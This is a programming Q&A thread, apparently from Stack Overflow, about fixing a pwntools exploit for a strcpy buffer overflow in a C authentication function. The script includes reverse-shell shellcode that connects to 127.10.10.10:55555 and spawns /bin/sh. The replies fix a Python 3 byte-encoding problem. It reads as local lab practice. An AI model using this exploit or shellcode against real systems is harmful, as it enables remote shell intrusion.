# Buffer overflow: send exploit with pwntools changes bytes

Tags: c, linux, buffer-overflow

I'm trying to exploit the following function:

```
int auth(char *username, char *password) {
    char userpass[16];
    char *response;
    if (debugmode == 1) {
        printf("Debug: userpass buffer @ %p\n", userpass);
        fflush(stdout);
    }
    if (strcmp(username, "admin") != 0) return 0; printf("***** password %p\n", password); fflush(stdout);
    strcpy(userpass, password);
    if (strcmp(userpass, "1974jailbreak!") == 0) {
        return 1;
    } else {
        printf("Incorrect username and/or password.\n");
        return 0;
    }
    return 0;
}
```

The buffer overflow is at the `strcpy()`.

I'm compiling it with `-m32 -z execstack -fno-stack-protector` and set `/proc/sys/kernel/randomize_va_space` to `0`.

The stack looks like: 28 bytes to EIP, EIP, the shellcode.

I'm using pwntools to exploit it:

```
from pwn import *
junk = ('AAA%AAsAABAA$AAnAACAA-AA(AAD') 
leaked = p32(0xffffcca0+28+4)
buf = "\x68" # from http://shell-storm.org/shellcode/files/shellcode-833.php
buf += "\xff\x0a\x0a\x0a"  # <- IP Number "127.10.10.10"
buf += "\x5e\x66\x68"
buf += "\xd9\x03"          # <- Port Number "55555"
buf += "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
buf += "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
buf += "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
buf += "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
buf += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
buf += "\xeb\xce"

p = remote('127.0.0.1', 4455)
p.sendline("PASS ".encode() + junk.encode() + leaked + buf.encode())
```

This is what gets sent by pwntools:

[image: bytes sent by pwntools]

The shellcode is clearly different and my exploit does not work. How do I send the right bytes?

EDIT: I'm using `python3`. @Ctx is right to point out it's due to the encoding.

```
$ cat test.py
print ("a" + bytes("b"))

$ python2 test.py
ab

$ python3 test.py
Traceback (most recent call last):
  File "test.py", line 1, in <module>
    print ("a" + bytes("b"))
TypeError: string argument without an encoding
```

Comment: I'm curious why you don't give the same comment on every question @MathieuBorderé

Comment: @MathieuBorderé someone (you?) downvoted, maybe you were right - why do people ask questions instead of knowing the answers? Weird

Comment: @MathieuBorderé deleted the comment. It was: `You won't learn much if you don't figure it out yourself.` (https://i.imgur.com/T8JDwBg.png cached by Google)

Answer (score 1):

In this line

```
p.sendline("PASS ".encode() + junk.encode() + leaked + buf.encode())
```

you encode the buffers to *UTF-8*. This is not what you want, you want to send them as they are.

I.e. the `"\xff"` in latin-1 is encoded to `"\xc3\xbf"` in UTF-8.

Remove the `.encode()` calls, then the correct bytes should be sent. Depending on the function `p32()` it might be necessary to call `bytes()` on `leaked` like this:

```
p.sendline("PASS " + junk + bytes(leaked) + buf)
```

Comment: You're right that those are the ones that I want to send, but if I do that: `can only concatenate str (not "bytes") to str`. I tried to use `p.send()` on each one individually, but it does not work

Comment: @tovivir3 Maybe this works, depends on `p32()` (see edit)

Comment: `p32()` converts hex to bytes (this gives the same error)

Comment: @tovivir3 Just tested it, works for me (even without calling `bytes()`). Please post the exact code you use and the version of your python interpreter

Comment: Edited; I'm using Python3

Comment: Almost the answer. The correct way is to do the opposite, `bytes()` on the string and leave `leaked` as is